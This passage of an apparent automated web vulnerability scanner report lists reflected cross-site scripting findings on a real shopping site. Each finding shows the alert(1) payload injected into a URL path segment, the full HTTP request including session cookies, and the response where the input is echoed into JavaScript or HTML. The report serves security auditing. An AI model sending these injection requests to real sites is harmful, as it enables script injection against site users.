Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d6e3"><a>13e96ed43f8">
...[SNIP]...

4.885. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac70a'-alert(1)-'2fe708cbd50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goodsac70a'-alert(1)-'2fe708cbd50/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goodsac70a'-alert(1)-'2fe708cbd50/235690923/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.886. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3717<script>alert(1)</script>faa87e74d2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsb3717<script>alert(1)</script>faa87e74d2a/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsb3717<script>alert(1)</script>faa87e74d2a <a href="#" id="backlink">
...[SNIP]...

4.887. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 253e6'-alert(1)-'f69723ef75e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923253e6'-alert(1)-'f69723ef75e/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923253e6'-alert(1)-'f69723ef75e/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.888. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload debf9'-alert(1)-'828a52ae0b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Storedebf9'-alert(1)-'828a52ae0b3/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:38:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Liquor-Storedebf9'-alert(1)-'828a52ae0b3/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.889. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e3e8'-alert(1)-'e3082307355 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Store/705e3e8'-alert(1)-'e3082307355 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:46:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Liquor-Store/705e3e8'-alert(1)-'e3082307355';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.890. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61333'-alert(1)-'7083acee0d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping61333'-alert(1)-'7083acee0d4/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:35:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping61333'-alert(1)-'7083acee0d4/Consumer-Goods/235690923/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.891. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5bc"><a>da4cf3e9fd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinged5bc"><a>da4cf3e9fd8/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinged5bc"><a>da4cf3e9fd8">
...[SNIP]...

4.892. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17e21<script>alert(1)</script>d27d41f48fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods17e21<script>alert(1)</script>d27d41f48fd/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods17e21<script>alert(1)</script>d27d41f48fd <a href="#" id="backlink">
...[SNIP]...

4.893. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a8b'-alert(1)-'9a4c016a8d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods77a8b'-alert(1)-'9a4c016a8d1/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods77a8b'-alert(1)-'9a4c016a8d1/235690923/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.894. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddd07'-alert(1)-'1611398788c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923ddd07'-alert(1)-'1611398788c/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923ddd07'-alert(1)-'1611398788c/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.895. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 566a8'-alert(1)-'2f530c60795 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Luggage566a8'-alert(1)-'2f530c60795/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Luggage566a8'-alert(1)-'2f530c60795/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.896. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6406'-alert(1)-'ecdd14a7de1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Luggage/41a6406'-alert(1)-'ecdd14a7de1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:00:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Luggage/41a6406'-alert(1)-'ecdd14a7de1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.897. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d3c"><a>ef19b500a40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping85d3c"><a>ef19b500a40/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping85d3c"><a>ef19b500a40">
...[SNIP]...

4.898. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7d6'-alert(1)-'9921276be78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request
